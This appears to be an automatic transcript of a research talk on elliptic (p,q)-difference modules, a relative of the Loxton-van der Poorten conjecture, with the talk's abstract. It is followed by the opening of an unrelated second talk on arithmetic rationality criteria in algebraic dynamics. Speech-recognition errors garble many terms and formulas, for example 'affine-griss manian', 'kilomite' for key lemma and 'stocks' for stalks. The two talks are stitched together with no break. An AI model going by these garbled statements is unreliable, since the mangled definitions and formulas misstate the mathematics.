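and the Loxton-van der Poorten conjecture, proved by Adamczewski and Bell, says that an F in K hat satisfying both already lies in K; in the additive analogue of Bezivin and Boutabaa the arguments x^{p^i} and x^{q^j} are replaced by p^i x and q^j x.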
This time the theorem lives on the additive group, and sigma and tau are of course endomorphisms of the additive group; K, again, is the function field of the universal cover, except that the universal cover is the additive group itself, because it is simply connected. Now, the proofs of these two theorems were quite different and used a variety of ideas, but about a year or two ago Schäfke and Singer came up with a uniform treatment of both of them, as well as of other similar results, due to Ramis and others, that I do not have time to survey; and this is what started me on the subject. I should add that very recently, just three weeks ago I think, Adamczewski, Dreyfus, Hardouin and Wibmer posted on the arXiv a remarkable strengthening, but you will have to wait for the talk on Friday to hear about it. So I would like to talk about an elliptic analogue. Let us introduce some notation. If Lambda is a lattice in the complex numbers, I denote by K_Lambda the field of Lambda-elliptic functions; as you all know, it is generated over the complex numbers by the Weierstrass ℘ function and its derivative. Again, we would like to consider functions not on C mod Lambda_0 but on its universal cover, and this amounts to taking the union of these K_Lambda over all sublattices Lambda of the given lattice Lambda_0. This is our base field K, and I should mention that it really depends only on the commensurability class of Lambda_0, not on Lambda_0 itself. K hat will again be the field of Laurent power series, and we view K as a subfield of this much larger field K hat. For the operators sigma and tau we take the elliptic p- and q-difference operators: we substitute pz or qz for the variable z. But of course, to keep the ellipticity, that is, to keep sigma and tau automorphisms of K, we now have to assume that p and q are integers, and, as before, that they are multiplicatively independent integers. For the main theorem I have to make a slightly stronger assumption: p and q are not only multiplicatively independent but in fact relatively prime. Then take an F in K hat, a Laurent power series, and assume it satisfies elliptic difference equations of the same type, where now the coefficients a_i and b_i are in the field K. The conclusion: you might guess that F is in K; well, it need not be in K, but it lies in a slightly larger ring, which I call R, obtained from the field K by adjoining the functions z, z inverse and zeta(z), where zeta(z) is the Weierstrass zeta function, which is, up to sign, a primitive of the Weierstrass ℘ function. It is very close to being elliptic, but it is not elliptic. It is enough to adjoin zeta(z) for one lattice: it is an easy exercise to see that once you adjoin zeta_Lambda for one Lambda, then zeta_Lambda' for all the commensurable lattices Lambda' is there. So this is our ring R, and that is the conclusion. Here are a few remarks. First, I do not know whether I can relax the assumption that p and q be relatively prime. The theorem is optimal: the reason I cannot deduce that F is in K is that, in fact, any F in R satisfies an elliptic q-difference equation for any q. And I raise a question to which I did not give an answer, but you can ask for a finer result: suppose the coefficients are all in a specific K_Lambda.
Well, what is the best Lambda' such that F is in R_Lambda', where R_Lambda' is as written on the slide? Now, before I go into details or any further discussion, I want to emphasize two basic differences between the two rational cases and this similar-looking elliptic case. The first is that in the two rational cases the proof eventually goes by meromorphic continuation: you somehow show that F really represents a function that is meromorphic everywhere, and a function that is meromorphic everywhere on P1 is rational, so you are done. But here, even after we meromorphically continue our F, we are faced with issues of periodicity, which are of a completely different nature. The second basic difference is that F need not in fact be in K: as you saw, the conclusion is that it lies in the slightly larger ring R, and this is related, as we shall see, to the existence of non-trivial vector bundles on the elliptic curve which are invariant under pullback by these isogenies, sigma and tau. These vector bundles were classified by Atiyah in 1957. In the rational cases, of course, every vector bundle over the multiplicative or the additive group is trivial. So, are there questions so far? Okay, if I do not hear anybody, then, Jason, if there is any problem with the connection, I rely on you. Good. I would like to switch from the language of equations to the language of difference modules. In the context of the three examples that we will be discussing, the two rational ones and the elliptic one, this is only a matter of language, but maybe at the end of the talk I will make a few remarks on why, in other circumstances, the language of difference modules is really better than the language of difference equations. A difference module is the following. You start with an arbitrary field K and an arbitrary group Gamma acting on K via field automorphisms, and you let C be the field of constants, the invariants of Gamma. A Gamma-difference module over K is a finite-dimensional vector space M over K equipped with a semilinear action of Gamma: in other words, for any little gamma in Gamma there should be a transformation phi_gamma which is linear over C and semilinear over K, as you see in the first bullet, and of course this should be an action, so the transformation associated to gamma composed with delta should be phi_gamma composed with phi_delta. The connection with equations goes through the following basic example. In the three examples we have been considering, we let K be this field and Gamma the group generated by sigma and tau inside the automorphisms of K; the meaning of p and q being multiplicatively independent is simply that this group is, abstractly, free abelian of rank 2. Then we have the power series F at hand, and we look, inside the field K hat, at the span over K, over the global field, of the sigma^i tau^j F. This M is obviously a K-vector space that is closed under the action of sigma and tau, because they commute, and the meaning of having simultaneous Mahler, difference or elliptic difference equations for both sigma and tau is simply that the dimension of this M over K is finite; therefore it is a Gamma-difference module. And under the assumptions of the three theorems, they will all follow from a similar theorem stating that this module M that we have just described is degenerate in some sense.
The key point, which is food for thought if you want to speculate or contemplate higher-dimensional analogues, is perhaps that the rank of Gamma is 2, while the dimension of the underlying curve, or the transcendence degree of the field K, is 1; so in some sense the system is overdetermined. Now, in the two rational cases, degeneracy simply means that M descends to the complex numbers: in other words, there is a representation of Gamma over C, which simply means, because Gamma is Z^2, a pair of commuting constant scalar matrices, such that our M is obtained via a semilinear base change, tensoring over C with K and extending the action semilinearly. In our case, the elliptic case, the degeneracy will be more subtle, and this more subtle structure theorem will be related to the vector bundles that I hinted at before. As in linear algebra, it is useful to introduce coordinates and matrices. We have Gamma, isomorphic to Z^2, sitting inside the automorphisms of K in each of the three examples, and we have M, which can be an abstract Gamma-difference module or the one that came from the example (you can now forget about the example). You express the action of sigma on a given basis in terms of a matrix, except that traditionally one denotes the inverse of the matrix of the a_ij by A and the inverse of the matrix of the b_ij by B. The only condition you really have to check is that phi_sigma and phi_tau commute; in linear algebra this would mean that the matrices commute, and in semilinear algebra it means that they satisfy this consistency condition: sigma applied to B, times A, equals tau applied to A, times B. If you change your basis, then in linear algebra you would get conjugate matrices; here you get twisted conjugate matrices, which is called gauge equivalence: A' is sigma(C) inverse times A times C, and B' is tau(C) inverse times B times C, where C is the matrix of the change of basis. As an immediate corollary, we deduce that the classification of Gamma-difference modules over K is basically the same as classifying consistent pairs (A, B) of matrices in GL_r(K) up to gauge equivalence; and this, if you prefer the language of non-abelian cohomology, is by definition the same as the determination of H^1(Gamma, GL_r(K)), but we shall not be using this language. I want to make a side remark: at this point, if you replace GL_r(K) by another linear algebraic group G over K, you arrive at the notion of Gamma-difference modules with G-structure. I do not know enough to know whether this has been explored; in p-adic Hodge theory there is an example of such a difference module, which is called an isocrystal, and this has been explored in the paper of Kottwitz from 1985. I would be happy to know whether this generalization has been explored. So let us start by discussing Gamma-difference modules over K hat, over the simpler fields of power series or Puiseux series. Either K hat is the Puiseux series field with sigma and tau the Mahler operators, or, in the other two cases, the additive and the elliptic one, K hat is the Laurent series field with sigma and tau the usual difference operators. In the elliptic case, of course, for global considerations p and q have to be integers, but now that we are dealing with the formal aspect it does not really matter.
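For reference in what follows, the consistency condition and the gauge action just described are, in formulas (as on the slide, up to notation):

```latex
% Consistency of the pair (A, B) and gauge equivalence under a change of basis C.
\begin{gather*}
\sigma(B)\,A = \tau(A)\,B,
\qquad
A' = \sigma(C)^{-1} A\,C,
\quad
B' = \tau(C)^{-1} B\,C,
\qquad A,\ B,\ C \in \mathrm{GL}_r(K).
\end{gather*}
```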
So the formal structure theorem tells us that in all these cases any Gamma-difference module over K hat indeed descends to C, or equivalently, in the language of matrices we just introduced, any consistent pair (A, B) is gauge equivalent over K hat to a commuting pair of constant scalar matrices. This has been known for a long time, I think, and the proof can be found in various places in the literature; it is based on the theory of Newton polygons and slopes, and I do not want to go into it. There is a slight issue of uniqueness: in the Mahler case the pair (A_0, B_0) of constant matrices is unique up to conjugation, and in the difference case there is the issue of what I think is sometimes called resonance, but essentially, up to resonance, it is also unique. Again, in the theory with which I was more familiar, that of F-isocrystals, this is a theorem of Dieudonné and Manin. So how would the proof of the conjecture of Loxton and van der Poorten go, following the ideas of Schäfke and Singer, of course? In this case, the Mahler case, K is the field we discussed before, K hat is the field of Puiseux series, and sigma and tau are the Mahler operators, and the theorem of Adamczewski and Bell follows quite easily from the fact that not only over K hat but even over K, any Gamma-difference module descends to C, that is, it is obtained from a finite-dimensional representation of Gamma by semilinear base change. I want to sketch the proof, because our proof in the elliptic case will begin in the same way, but there will be differences, as I will point out at a certain point. We look at the three points 0, 1 and infinity. Why these three points? Because they are fixed points of the operators sigma and tau. We introduce local parameters at these points, t_0 = x, t_infinity = 1/x, and t_1 = x - 1, and we denote by O hat_i, for i being 0, 1 or infinity, the completion of the local ring at that point, and by K hat_i its fraction field, the complete local field at that point. We start with some consistent pair of matrices describing our M in some basis, and by the formal structure theorem we know that at each of these points separately we can make a gauge transformation, with a C_i in GL_r of the completion at that point, so that the resulting A_i, B_i are constant. For i equal to 0 or infinity, since we are not quite dealing with rational functions, we might first have to replace the variable x by some root of x, but this is a small point. Now, remember that we are allowed to replace (A, B) by any gauge-equivalent pair over K, because this simply amounts to choosing a different basis over K, and weak approximation tells us that we can find one matrix with entries in K that simultaneously approximates C_0, C_infinity and C_1 in the topologies of the corresponding local fields. If we make such a gauge equivalence, such a change of basis if you want, then we may assume that the C_i are not only in GL_r(K hat_i) but in GL_r(O hat_i), and in fact, though we will not need it, you may assume they are as close to the identity matrix as you want. The next step consists of some estimates on the formal Taylor expansions and local analyticity; I should say that under this assumption, after the weak approximation, A and B will be analytic at the corresponding points, not just meromorphic. And of course you use this; can you see my cursor if I move over this?
Yeah, okay. So you see, if you use this, for example for A, it gives a relation expressing sigma(C_i), that is C_i(x^p), as A times C_i times A_i inverse. But A_i is constant and A is everywhere defined, so this gives us a functional equation, and we use it to show that the C_i are not only formally analytic but in fact analytic in some disc. In fact, we can boost up the region of convergence, or rather the region of meromorphicity, using the functional equation, because A is everywhere meromorphic and A_i is constant. Using this repeatedly, we boost the region of meromorphicity of C_0 to the full southern hemisphere, of C_infinity to the full northern hemisphere, and of C_1 to P1 minus the two poles, the north and the south pole. Now we have a large overlap: at the beginning these were formal power series, but now they overlap, so we can compare them on the overlap. For example, we can compare C_0 and C_1 on the punctured southern hemisphere, and we get this type of functional equation; it is an easy exercise to see that from this functional equation C_01 in fact has to be constant. But this means that C_1, which is this constant matrix times C_0, or C_0 times the constant matrix, is actually meromorphic, even analytic, at zero too. Likewise, comparing C_1 to C_infinity, you get that C_1 is meromorphic not only outside the two poles but also at the two poles; therefore it is a rational function, and therefore it allows you to reduce the structure to the complex numbers. This is basically the whole proof, and it is a beautiful idea of Schäfke and Singer. So let us start discussing elliptic (p, q)-difference modules, or elliptic Gamma-difference modules (sometimes one calls them elliptic (p, q)-difference modules when the group Gamma is generated by the p-difference operator and the q-difference operator), of low rank. Again, K is the field of elliptic functions on the universal covering of our given elliptic curve, and forgive me for switching to sigma(f)(z) = f(z/p) and tau(f)(z) = f(z/q) rather than f(pz) and f(qz); this is just to be consistent with my paper, and it simply amounts to considering sigma inverse and tau inverse in the original notation. Let us start with rank one. Let M_1(a, b) denote the one-dimensional module K times e, where sigma acts on e as a inverse times e and tau acts on e as b inverse times e, with a and b complex numbers. You see immediately that this has the underlying complex line C times e as a C-structure. If we denote by M_1(a, b) this very simple rank-one difference module that descends to C, then the proposition is that every rank-one Gamma-difference module is in fact isomorphic to a unique such M_1(a, b). This is already non-trivial, because the issue of periodicity, as we will explain, shows up already here. In rank two this is already false. I must admit that when I started working on it I hoped to get a generalization in any rank, but after not being able to do it I found the following counterexample, and this counterexample in rank two is prototypical: it turns out to be really prototypical for all that is going on later. So let zeta be the Weierstrass zeta function; you can write it as the logarithmic derivative of the Weierstrass sigma function, or, up to a sign, it is a primitive of the Weierstrass ℘ function.
Since the Weierstrass ℘ function is periodic, if you move the variable z by a lattice vector omega and subtract zeta(z), you get a constant; this constant is traditionally called the Legendre eta function of omega, and it is a homomorphism from the lattice to the complex numbers. Let g_p(z) be p times zeta(qz) minus zeta(pqz). You see immediately that this is elliptic; this function is Lambda-elliptic, because if we change z to z plus omega, both p times zeta(qz) and zeta(pqz) change by the same number. Similarly, let g_q be the function obtained by reversing the roles of p and q, and let A and B be these very nice matrices: A with rows (1, g_p) and (0, p), and B with rows (1, g_q) and (0, q). You can check that they form a consistent pair, and therefore they correspond to what I call the rank-two standard special module. Explicitly, it is K^2 with sigma acting by multiplication by A inverse on the vector obtained by applying sigma to the coordinates, and tau acting by B inverse times the vector obtained by applying tau to the coordinates. In this rank-two case you can show, and this will be a special case of our main theorem, that every rank-two elliptic (p, q)-difference module either admits a C-structure or, up to a twist by a rank-one module, is isomorphic to this standard special module. And this is an exclusive or: the standard special module and its twists cannot descend to C; they do not admit a C-structure. Maybe I should ask if there are questions so far. Jason, nobody has been sending you anything in the chat? Okay; tell me if I am too quick or too slow. Good. So let us move to the general classification theorem. Now that we have seen what happens in ranks one and two, let M be a module over K of general rank r, represented by a consistent pair (A, B) in some basis. As I promised, we are going to follow the path of Schäfke and Singer. The first step is much easier here, because instead of considering zero, one and infinity we only have to consider zero: by the formal structure theorem we find a C in GL_r over K hat such that, if you apply the gauge transformation using this matrix C, you get a commuting pair of constant scalar matrices. This is the initial step. The next step is again the same, but we do not have to use weak approximation because we are dealing with only one point: it follows just from the density of K in K hat that if we approximate C very well by a matrix D of global elliptic functions, replace (A, B) by the pair gauge-equivalent via this D, and adjust C correspondingly, then we may assume that C is in GL_r(O hat). As before, it follows that after this gauge equivalence A and B are analytic at zero. The next step is again the same: estimates on formal Taylor expansions give us, exactly as before, that C is analytic in some small disc. And the next step, the fourth, is again as before: you use the functional equation, which basically tells you that C(pz) is A times C times A_0 inverse; well, it is meromorphic continuation rather than analytic continuation, because A might have poles far away from zero, but once you have it at radius epsilon you get radius p epsilon, then p squared epsilon, and eventually you cover the whole complex plane. But you are then faced with a big, big difficulty, because now you are faced with the issue of periodicity.
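Before turning to the periodicity problem, let me record the rank-two counterexample in formulas; this is my transcription of the description above, not a quotation of the slide:

```latex
% The rank-two "standard special" module (transcribed from the description above).
\begin{gather*}
g_p(z) = p\,\zeta(qz) - \zeta(pqz),
\qquad
g_q(z) = q\,\zeta(pz) - \zeta(pqz),
\qquad
A = \begin{pmatrix} 1 & g_p \\ 0 & p \end{pmatrix},
\quad
B = \begin{pmatrix} 1 & g_q \\ 0 & q \end{pmatrix},
\end{gather*}
```

where the quasi-periodicity zeta(z + omega) = zeta(z) + eta(omega), together with eta(n omega) = n eta(omega) for integers n, shows that g_p and g_q are indeed Lambda-elliptic.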
If you want to prove that c, this would not be the case, but if you wanted to prove that c is periodic for some lattice lambda commensurable with our lambda not, then you'd be facing a problem. So the key idea is that something of the periodicity is saved. And to explain this, I want to introduce some sheaves, but these are sheaves in the classical topology of c. So script m is the sheaf of meromorphic functions, script O is the sheaf of homomorphic functions, G is the sheaf glrm, sheaf of r by r invertible matrices with entries in meromorphic functions, h is the sub sheaf glrO, and f is the quotient, sheaf of cosets. So let's know, first of all, our c, what do we know about this matrix c so far? We tortured it enough to know that it is globally meromorphic. In other words, it's a global section of the sheaf G. Now, the sheaf f has a nice property that its sections are discreetly supported, because, right, because the poles of meromorphic functions are isolated. And what are the stocks of f at each point, so I'm going to explain, there are glr of La Ronde power series over glr of Taylor series. Okay, maybe you would argue that they have to insist on convergence, but because I'm taking this, these cosets, it's okay to write it like this. Now, this is a very well known object, this is called an affine-griss manian, and they play important role in many branches of mathematics, but I'm not sure if you can see it, but I think there are branches of mathematics, but I don't know much about them except that these are affine-griss manians, and I won't be using much about them. Now, we can identify the stock at xi and the stock at xi plus omega via translation, and we call a section of any of the sheafs, but in particular of the sheaf f of the sheaf of affine-griss manians lambda periodic, if under this identification, the germ of the global section at xi is the same as the germ at xi plus omega for every xi and any lattice vector omega, and we denote the lambda periodic sections by gamma sub lambda. And another terminology we will call as prime a section, ambitification at zero of s, if it only differs from s at the point zero. In other words, if when you restrict this global section to the huge open set, which is the complement of zero, it agrees with s. And here is the first theorem, which I call the periodistic theorem. We'll see it not be periodic, but the image of xi, remember xi was a global section of g. Okay, let me remind you g is glm, h is glro, and f is the sheaf of affine-griss manians glm over glro. So as a global section of g, xi need not be periodic, but as a global section of f, its image is lambda periodic for some small enough lambda, provided you allow a modification at zero, and this modification at zero is a nuisance, but you really have to do it sometimes. So as an example, what this means, let's take the case r equals one, f is simply the sheaf m star over o star, and via the degree map, it's simply z, right, but z somehow discreetly, at each point, discreetly and discontinuously, you put z. And cz is simply a global meromorphic function. What do you know about it? You know that c of pz over cz and c of qz over cz are elliptic functions. That's the input in this case. And the corollary would be not that c is periodic, but that its divisory is periodic. This is what it means to talk about the image of c, c bar, as a global section of f in this case. 
However, when r is one, you can invoke abel jacobi, and it's a little exercise to show that in this case, in fact, the modification at zero translates to multiplying by some power of c, z to the m, for some m times c, z would be periodic. But in rank two, this is already not the case. So let us see what we have done so far. Fix some lambda, and let's introduce the analytic notation. A lambda is the restricted product of these completions of the field k at xi, these fields of the Laurent power series around xi, restricted as usual with respect to the ring of holomorphic functions of Taylor expansions. And that blackboard bold O be the product of the O xi hat. So s, I did not by s, I didn't say so, but I did not by s, this modification of c bar that the periodist theorem gives me. So this s is a lambda periodic global section of f, and this is simply an element of glr of the adels of lambda. The adels is a ring, you can take glr of the adels of lambda over glr of this subring of the adels, oh lambda, the everywhere holomorphic adels. Now, to what extent this s is unique, remember that c is determined by m only up to left multiplication by a global matrix, a matrix of globally elliptic functions. So right this would be the gauge equivalence or the change of phases. So this gives us a well-defined class in this double-coset space of glr a lambda over glr o lambda on the right and over glr k lambda in the left. And this is a very familiar double-coset space. It's called the complex points of the stack, but these are big words. It's what it is, it's a double-coset space, and it classifies isomorphism classes of rank r vector bundles on the elliptic curve c over lambda. And remember this we can do for any lambda that is small enough as given to us by the period dsd theorem. So to sum up, m gives us c yields s and the class of s in this double-coset space depends only on m and it's a class of a certain vector bundle. And the functoriality tells us that for all lambda small enough, these e lambdas, these vector bundles are compatible under pullback and also they're invariant under multiplication or pullback rather via zogeny p or q if you want. Now in general vector bundles over varieties are very difficult to classify, but luckily Atiyah in a beautiful paper in 1957 classified all vector bundles on the elliptic curves. And one thing that he proved, he proved many other things, is that for any r there exists a unique up to isomorphism, a unique vector bundle, as denoted f r on c mod lambda on the elliptic curve c mod lambda, which is in the composable doesn't break up as a direct sum of vector bundles, has rank r has degree zero and it admits non-trivial global section. And in fact any other rank r degree zero in the composable vector bundle would be a twist of this one by a line bundle of degree zero. So this allows us to deduce quite easily that given this m we can attach to it and in the variant that we call the type, which is a partition of r into r one plus r two plus r k let's arrange them in increasing order it doesn't matter such that for all small enough lambda this vector bundle e lambda is isomorphic to f r one direct sum f r two and so on direct sum f r k it's of a very specific form. And moreover you can really write down using complex analysis a matrix in one r lambda representing this r f r and it's the matrix u r unipotent matrix which is the exponential of the vastre zeta function times n where n r is the nilpotent matrix with ones just above the main diagonal and zero elsewhere. 
So this is the matrix i plus zeta times n plus zeta squared over two factorials times n squared and so on right you you have all these diagonals above the main one and they're multiplied by zeta to the i over i factorial so it's a very explicit nice matrix of course this sum is finite because n is nilpotent and in fact it turns out that m admits a c structure if and only if its type is one one one in other words if and only if this vector bundle e lambda is trivial i haven't told you but of course f one the atia vector bundle frank one is the trivial vector bundle so e lambda is trivial even only if the type is one one one so from now on let us assume to simplify the presentation that the type of m is at the other extreme okay so there will be of course a lot of combinatorics that has to deal with the intermediate partitions but let's assume that the partition is simply r equals r in other words that e lambda is already in the composable so in this case the global section s remember it was we interpreted it as a global section of fun r lambda but now we know thanks to atia that it's also the global section sorry it's also represented by ur it's a double cost that's represented by ur now you can change it on the left by a matrix an infertible matrix with elliptic functions is input and then you can deduce that c well as is not quiet c because of this modification at zero so except possibly at zero c as ur times d and d now must be everywhere holomorphic because it should correspond in bond r lambda to something in this subring o rather in glr over that subring o so let us change the scalar matrices that we have arrived at in the beginning a zero and b zero by a gauge transformation using this d and we get matrices that they call t and s and then you can deduce that t and s are actually globally holomorphic and you you you finally get rid of this annoying uh mb u d at zero annoying there's a little emma here but uh you get t and s which are in glr of globally meromorphic functions and your a and b that represented the module uh of course there are matrices with entries in elliptic functions are given by urz over b t urz inverse or urz over q s urz inverse okay so remember this equation one is very important and now comes the second deep so you're in the key what i call the key lemma and this is that after a mild operation which is conjugation by scalar matrix commuting with ur okay this is allowed this equation one forces t and s to be a very special form in fact up to a constant a or b that corresponds of course to a twist by a rank one module and then there's simply the diagonal matrix one p p squared up to p to the r minus one or one q q squared up to q to the r minus one and now comes the main structure theorem in the case where the type is r if the type of m is r then up to a twist by a rank one module is isomorphic to what i call the rank r standard special gamma difference module so you have seen it before for r equals two this was exactly the example with which i started and the most the more general uh setup is this one so you have explicit t and s you you see them here you have a very explicit ur and you get some explicit a and b that involve these functions g p and g q and some tutorials and some nice formula they're upper triangular because everything here is upper triangular so well if the type is r m need not be need not descend to the complex numbers but still it is of a very special shape so here are some final remarks before i spend a few minutes i want to give you two 
slides at the end but what i call fun with elliptic functions to prove this kilomites really fun so the first remark is that as i said the kilomite and the periodicity theorem are the main technical steps as i also said when the type is arbitrary not one one one one and not r anything in between anything in between a more complicated structure theorem exists but it's still completely explicit and enough to give us the main theorem and finally that the theorem that asserts the theorem with which we started the talk asserting that f power series f satisfying simultaneously an elliptic p difference equation an elliptic q difference equation lies in this r follows from the main structure theorem applied to this m and of course now you can see where at least where the zeta function comes from the partial zeta function it comes from its appearance in this matrix u r so if there are no questions i will give some time for questions but if not i want to just show two more slides and prove the kilomite in a special case but let's see if there are questions about the formulation or about the logic of the proof yeah no okay i hope everything is clear okay good so here are these two slides that i promised either they call fun with elliptic functions and i will give you the proof of the key lemma when r equals two so forget about the theorem just the key lemma so the key lemma had the following input we had an equation which we called equation one let us go back and see it here okay that basically rearranging it says that a times u is u at z over p times t where a is one of the a and b that is a matrix of elliptic functions giving us of course the structure as a gamma difference module and t is this matrix that we deduced is everywhere holomorphic including at zero and u is this very special case of u r which is one zeta z one good so let's start exploring the consequences of this identity you start with the lower left corner this gives you c of z equals gamma of z but c is everywhere elliptic it is elliptic and gamma is everywhere holomorphic so c equals gamma equals a constant now you do bootstrapping why why do i call it bootstrapping because you use what you have proved about about c before that it is constant to improve and show that c is in fact zero c equals gamma equals zero and for this you take the lower right corner so bootstrapping step lower right corner tells you that c times z of z plus d of z equals zeta now take the sum of the residues in both sides over a fundamental domain for for for the elliptic curve you see delta is everywhere holomorphic it's it need not be periodic but but if everywhere holomorphic it contributes nothing d is elliptic so the sum of the residues is zero zeta has sum of residues which is non-zero so c must be zero so you deduce that c is zero and now you're left with the equation d equals delta so d is elliptic delta is everywhere holomorphic so they are constant as well now go to the upper left corner now we're allowed to rescale everything because we still have the freedom of twisting by m1ab by a rank one module so let's rescale so that this constant delta equals d is p and now looking at the upper left corner you get az equals alpha z and again for the same reason it is a constant both entire and elliptic and finally you look at the right upper corner and you get the equation az plus b is pz z over p plus beta so here is the only place where you have both zz and zz over p and you take again the residues and sum them over a fundamental parallel parallel be bad 
and you'll get that that for the residues to sum up properly the only possibility is that a is what was alpha also is one but then z of z minus p z of z over p is maybe up to the sign what I called before gp and this is an elliptic function and this should be beta minus b so beta again is both elliptic and homophic and it's constant finally to get rid of this beta all together you conjugate everything by a an upper triangular scalar matrix that's allowed and you end up with t equals 1 0 0 p and a having this very particular shape and you can guess that s is 0 1 0 1 0 0 q and b is 1 gqz 0 q so the general rank case uses exactly the same principles only the algebra and the bootstrapping it's not two-step bootstrapping it's r-step bootstrapping but basically it's it boils down to these same principles okay so I think I'm three minutes about time so thank you for your attention and please stay tuned for sure lots lecture on Friday thank you very much all right thank you for the talk and any questions let's see the change may I ask a question hi yeah hi I was wondering if it would be reasonable to include the data function in the base field so that you will have some some kind of analogous statement or yeah I think that's a very good point so as I said at the beginning I'm studying these things from from a gaula point of view or from point of view of this picard which we saw rings I think the answer is absolutely you're right absolutely this should be in some sense the better field maybe let's stick to rings because this is a slightly more precise result that this ring R you do not really need to take the field generated but by zeta and nz but I think you're right I think that this field somehow has better properties and that could be another formulation you're absolutely right thank you I'm very happy to see the faces of everybody finally because I was waiting for the last year papers with people that I don't know and or looking at papers people that I don't know so now I see their faces oh hi Joe I see Joe Szilvan I do know you for many years yes yes yes and Moshe Kaminsky I do know some people here yeah Zoe probably from her visits to Jerusalem so is there any other question I sort of general Pilbara theorem 90 that might sort of explain this non-Abelian poemology or interpretation or okay so who was asking that is me oh Jason hi okay so yeah so so the concept of the gamma difference module of course is very general maybe I'll use this opportunity to make the remark they wanted to make at the beginning and and if gamma is a finite group then what Hilbert's theorem 90 tells us is exactly the the theory of gamma difference modules is void that's that's one way to interpret Hilbert's theorem 90 is saying that that there are no non-trivial gamma different modules if finite group because right that's basically what Galois theory will tell you that gamma appears as a finite Galois extension and then you invoke up so in a way all this business in the language of of Galois Comology you can think of it as failure of Hilbert's theorem 90 in cases where gamma are come from some dynamical systems in a way okay not I imagine the interest in in these operators like yeah come somehow from questions in dynamics what I wanted to say is that there is yeah there is the language of equations and the language of modules and of course this is like in PDE's you know you you can either work in the language of partial differential equations linear of course only linear PDE's or the language of the modules and for 
this gamma that we talked about which is z squared a billion of frank two this is completely equivalent but you could think for example still in the rational case what would be a good theorem not of one of two molar operators or two q difference operators or two shift operators as in the paper by Schiffkin's finger but what would happen if you consider one molar operator and one q difference operator and it turns out that the Galois group generated by these two now is generalized the hydral and it's generally the hydral in a way that it is not enough to write two equations for the molar and the difference operators you really have to assume that this module is finite dimensional and if you want to express it in equations I think I might be wrong but I think that the number of the minimal number of equations that you would need would depend on p and q so there are cases I think were really this language of difference modules gives you a better way to formulate theorems than the language of equations yeah good
Adamczewski and Bell proved in 2017 a 30-year old conjecture of Loxton and van der Poorten, asserting that a Laurent power series, which simultaneously satisfies a p-Mahler equation and a q-Mahler equation for multiplicatively independent integers p and q, is a rational function. Similar looking theorems have been proved by Bezivin-Boutabaa and Ramis for pairs of difference, or difference-differential equations. Recently, Schafke and Singer gave a unified treatment of all these theorems. In this talk we shall discuss a similar theorem for (p,q)-difference equations over fields of elliptic functions. Despite having the same flavor, there are substantial differences, having to do with issues of periodicity, and with the existence of non-trivial (p,q)-invariant vector bundles on the elliptic curve.
10.14288/1.0397420 (DOI)
He's speaking about arithmetic, columnar and algebraic dynamics. Thank you very much. It is a great pleasure to be able to participate in this wonderful conference and workshop. I learned a lot from the previous talks. I hope my topic will fit into some of the things presented at the workshop. I begin with a motivation from the field of algebraic dynamics that first got me to think about arithmetic rationality criteria of the kind that I will discuss. Then there is a more recent development, which exposes a joint work with Frank Kalegari and Yunqing Tang for the second part. Around arithmetic holonomicity in the theory of g-functions and an application that I hope to outline. We consider the familiar setting from algebraic dynamics where I take an iteration, some endomorphism of alpha in space. That's a dynamic system about the simplest non-trivial kind. We do not have an extent to a projective space. Endomorphism is given by polynomials in the coordinate. This is a polynomial map. I consider a second coordinate. I'll call it lambda. That denotes a regular function, just morphism or polynomial. We ask for the growth behaviors of the height. This will be over a global field K. We take any orbit, the intention is it should be pretty arbitrary, and just record the values of the coordinate lambda or the function lambda along the orbit. We ask how can this grow and also the sequence of degrees if it is not eventually periodic. We start with a very obvious observation, just set theoretically. If you have an iteration from zd to zd, let's see how the dimension will come into play in the bounds we can expect and improve. Just by the pigeonhole principle, this is the north cut trivial bound, if the orbit is not eventually periodic, then just by arranging the points, arranging the orbit by increasing height, arranging points by bounded height, there are noting that there are not many points of height at most. This is where I will use the logarithmic height. Then we have a very obvious a priori bound. There is a dichotomy that either the orbit must be finite or the logarithmic height roughly grows at least n to the power 1 over d in the sense of taking the lim soup along the orbit. I like to start here because we will also mention some interesting work on this subject to which my criteria also relate. The arithmetic criteria will enter in the following way. Instead of doing this set theoretically, we can just, so let's now give them up an algebraic structure. I have a polynomial in the variables. For simplicity here, I assume it takes zd to zd to zd. We may reduce module of primes and do the same observation that the reduced orbit acts on a finite set of cardinality p to the d, the number of fp points, mod p points. It must be pre periodic and its pre period and period are both bounded by this. A very convenient way to use this is on the level of the generating function. Now if lambda is another polynomial this time function to z, then we record our orbit history on a formal power series which will be a generating function with integer coefficients in this case. It has various mod p rationality conditions that the reduction of mod p of this power series we have seen must be rational just by pigeonhole because we have finite iteration on a finite set and the degree of this rational function is at most p to the d. Here is a criterion of this kind that will immediately lead lower bound on the growth of the orbit. 
I think I, well essentially all of this goes back to a short paper from 1981 published in Acta Ritmetica. I actually have their evidence below on my slides. Also in the full generality I, in higher dimension as well, I outline, I have a short preprint on archive with this criterion. It just follows although Daniel considered the language of linear current sequences looking at the coefficients of the power series. But on the level of power series it reads we have f of x, a formal power series over a global field k. And for every place v at which we can reduce mod v, let's consider the degree of the reduction if that is, if the reduction is a rational function. And if the reduction does not exist or is not a rational function I'll just take the convention that dv is just infinity. And then we have the criterion that this formal power series is in fact a rational power series just as soon as these inequalities fulfilled. And now for this talk the quantity on the right will be ubiquitous. This is a standard notion of height for formal power series. I'll call it the height of the power series. I use this subscript k just to keep the general case in mind because but maybe you want, maybe it is good to restrict to k to the rational field q then I will omit the index just include the global function field case as well where we have no ground field. And then the condition is this inequality on the residual characterities of the finite fields, finite residue fields. It roughly says that if we have enough mod p rationality, rationality in a quantitative sense against the growth of the coefficients of the function ultimately all comes down to the product formula in the global field then the function is rational. In fact this is obviously a characterization the converse is trivial. So this is completely characterizes the rational functions in an arithmetic way. The proof is a typical use of Ziegels lemma and I'll just indicate quickly because we will, the theme will occur in the more in the more recent criteria. We have, we can use m equations in m variables for these choices and there was this parameter kappa in this in the criterion that will come from exactly Ziegels lemma as the Dirichlet exponent. And then we construct this is typical transcendence extrapolation proof with auxiliary construction. We start with an auxiliary construction which is the approximate relation. We solve a linear system of equations for a polynomial q with integer coefficients and small height. We have degrees of p and q bounded by this and height bounded by that. And then extrapolate the coefficients using the multi-information. This is like the trivial Bezou bound in the projective space over the residue fields for OV. Just the bound on the intersection multiplicity at zero by the total degree. And then we use the product formula and the details are quite easy. Again here is the reference to the original paper actually it's 1982. And I also mentioned that this is in fact can the optimal version is not what I wrote. The following the generalization of the conjecture of Roussa on pseudo polynomials. The shark version should delete somehow the parameter kappa that I will not discuss but that came artificially in Ziegels lemma. In the in the applications of the arithmetic 